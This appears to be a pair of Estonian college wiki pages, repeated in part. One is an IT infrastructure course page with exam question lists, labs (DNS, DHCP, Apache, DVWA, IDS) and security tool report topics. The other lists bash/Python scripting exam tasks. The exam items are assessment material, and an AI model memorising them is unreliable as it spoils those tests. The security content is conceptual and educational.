*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

[[fabric]]

[[mpstat]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-20T05:35:37Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

[[iodine]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-05-19T07:41:20Z

Mernits: /* Python/BASH kontrolltöö 19. mai 2015.a. */

==Python/BASH kontrolltöö 19. mai 2015.a.==

Loo skript, mis saab käsurealt kolm parameetrit. 1. string 2. sisendfail 3. väljundfail

* Skript kontrollib, kas sisendfaili saab lugemiseks avada (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõik read sisendfailist, mis sisaldavad esimese argumendina antud sõna.

==BASH kontrolltöö 12. mai 2015.a.==

Loo skript, mis saab käsurealt kolm parameetrit. 1. kasutajanimi 2. Väljundfail 3. kataloog

* Skript kontrollib, et kasutajanimi on olemas. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõikide failide nimekirja, kuhu esimese parameetrina antud kasutaja saab kirjutada ja mis asuvad kolmanda parameetrina antud kataloogis või selle alamkataloogides.

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
/sedapoleolemas
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Kui faili/kataloogi ei ole, siis kirjutab (not found). Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
/sedapoleolemas,not found
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

